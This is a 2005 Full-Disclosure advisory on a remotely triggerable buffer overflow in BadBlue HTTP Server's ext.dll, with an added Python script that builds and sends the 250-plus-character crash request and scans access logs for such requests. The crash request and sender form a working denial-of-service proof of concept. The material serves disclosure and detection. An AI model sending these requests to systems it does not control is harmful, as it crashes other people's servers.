List:       full-disclosure
Subject:    [Full-Disclosure] Badblue HTTP Server, ext.dll buffer overflow
From:       Andres Tarasco <atarasco () sia ! es>
Date:       2005-02-26 17:30:16
Message-ID: F224FBA669BC42488E34CF105B4DD54D03025085 () intramail

SIA International Security Advisory - Badblue HTTP Server, ext.dll buffer
overflow

* Release Date:
February 26, 2005

* Vendor:  
Working Resources Inc. http://www.badblue.com

* Versions Affected:
Confirmed under Badblue HTTP Server v2.55

* Severity:
Critical (remote code execution)

* Summary:
"BadBlue is not only a server, it's a complete file sharing system that is
simply easier and faster to use than anything else. Why? Because BadBlue
lets you use a tool you already know well: a web browser."
"In seconds, you can turn your PC into a powerful web server. You can easily
share photos, music, videos, and much more. With its simple menu-driven
interface and pop-up wizards to guide you through setup, there's no faster
way to share files"


* Technical Details:
SIA has discovered a buffer overflow in EXT.DLL, the ISAPI extension that
handles BadBlue HTTP requests. The overflow is triggered by a specially
crafted HTTP request: when the mfcisapicommand parameter is longer than 250
characters, several registers are overwritten with attacker-controlled data,
so an attacker can execute code or cause a denial of service by crashing the
server. The following request crashes the remote server:

GET /ext.dll?mfcisapicommand=AAA...[250 chars]...AAA&page=index.htx

Windbg trace:
(360.21c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=026bda14 ebx=01130478 ecx=41414141 edx=0113057d esi=41414141 edi=77e2b495
eip=10042004 esp=026bd8f4 ebp=026bdbe0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for E:\BadBlue\PE\ext.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for E:\BadBlue\PE\ext.dll -
ext!GetExtensionVersion+0x13f7:
10042004 8b3e             mov     edi,[esi]            ds:0023:41414141=????????

In the trace above the faulting instruction, mov edi,[esi], reads through
esi, which holds 0x41414141 (the 'A' filler from the request), so the crash
is a dereference of an attacker-controlled pointer. Successful exploitation
of this flaw could allow remote code execution with Administrator rights.
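
The crash request above, as an added example that is not part of the
advisory and not code from Working Resources: a Python script that builds
the request (with 'A' filler only, as in the trace; no return address or
shellcode, since the advisory does not establish the overwrite offset) and
a check that flags such requests in web-server access logs. The target host,
the port, the sample log lines and the 250-character limit used for
detection are assumptions taken from the text, not from the product.

```python
"""Crash request for the BadBlue ext.dll mfcisapicommand overflow and a
matching access-log check. Added example; not code from the SIA advisory
or from Working Resources. Host, port and the sample log lines below are
constructed assumptions."""
import re
import socket
from urllib.parse import parse_qs, urlsplit

# Threshold stated in the advisory: more than 250 characters in
# mfcisapicommand triggers the overflow.
MAX_SAFE_LEN = 250


def build_crash_request(host="192.0.2.10", length=300, filler=b"A"):
    """Return the raw HTTP/1.0 request the advisory describes, as bytes.

    The filler is 0x41 ('A'), the value seen in esi/ecx in the WinDbg
    trace. No return address or shellcode is included: this reproduces
    the denial of service, not code execution."""
    target = b"/ext.dll?mfcisapicommand=" + filler * length + b"&page=index.htx"
    return (b"GET " + target + b" HTTP/1.0\r\n"
            b"Host: " + host.encode("ascii") + b"\r\n"
            b"Connection: close\r\n\r\n")


def send_request(host, port=80, length=300, timeout=5.0):
    """Send the crash request to a test instance and return whatever the
    server answered (empty bytes if it closed the socket or died).
    Not exercised offline; only use against systems you own."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_crash_request(host, length))
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except (socket.timeout, ConnectionResetError):
            pass
    return b"".join(chunks)


def mfcisapicommand_length(request_target):
    """Longest decoded mfcisapicommand value in a request for /ext.dll,
    or 0 if the target is another path or lacks the parameter.

    parse_qs decodes percent-encoding, so '%41' * 260 counts as 260,
    the length the server sees after its own decoding; path and
    parameter name are compared case-insensitively (Windows hosts)."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/ext.dll"):
        return 0
    longest = 0
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() == "mfcisapicommand":
            longest = max(longest, max(len(v) for v in values))
    return longest


# Request line inside a Common Log Format entry: "GET /path HTTP/1.0".
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')


def find_overflow_attempts(log_lines, limit=MAX_SAFE_LEN):
    """Return (client, target_prefix, length) for each log entry whose
    mfcisapicommand value is longer than the limit."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if m is None:
            continue
        n = mfcisapicommand_length(m.group("target"))
        if n > limit:
            client = line.split(" ", 1)[0]
            hits.append((client, m.group("target")[:40], n))
    return hits


# Constructed sample log (not real traffic): a normal call, a crash attempt
# with a raw 300-byte value, a percent-encoded 260-byte value with odd
# casing, and an unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Feb/2005:17:30:16 +0100] "GET /ext.dll?mfcisapicommand=help&page=index.htx HTTP/1.1" 200 512',
    '10.0.0.9 - - [26/Feb/2005:17:31:02 +0100] "GET /ext.dll?mfcisapicommand='
    + "A" * 300 + '&page=index.htx HTTP/1.0" 500 0',
    '10.0.0.9 - - [26/Feb/2005:17:31:40 +0100] "GET /EXT.DLL?MfcISAPICommand='
    + "%41" * 260 + '&page=index.htx HTTP/1.0" 500 0',
    '10.0.0.7 - - [26/Feb/2005:17:32:11 +0100] "GET /index.htx HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    print(build_crash_request().decode("ascii")[:80] + "...")
    for client, target, n in find_overflow_attempts(SAMPLE_LOG):
        print("%s sent a %d-char mfcisapicommand via %s..." % (client, n, target))
```

The log check measures the parameter after URL decoding and ignores case in
both the path and the parameter name, so a percent-encoded or mixed-case
variant of the request is caught as readily as the plain one.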


* Solution:
Upgrade to the latest available version. At the time of writing the vendor
provides version v2.6, available for download at
http://www.badblue.com/bb98.exe

* Credits:
Andres Tarasco (atarasco _at_ sia.es) discovered this vulnerability.

* Disclosure Timeline:
December      2004 - Discovered
December 20,  2004 - Initial vendor notification
December 21,  2004 - Initial vendor response
January 3,    2005 - Vendor patch released (v2.60)
February 26,  2005 - Public disclosure


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html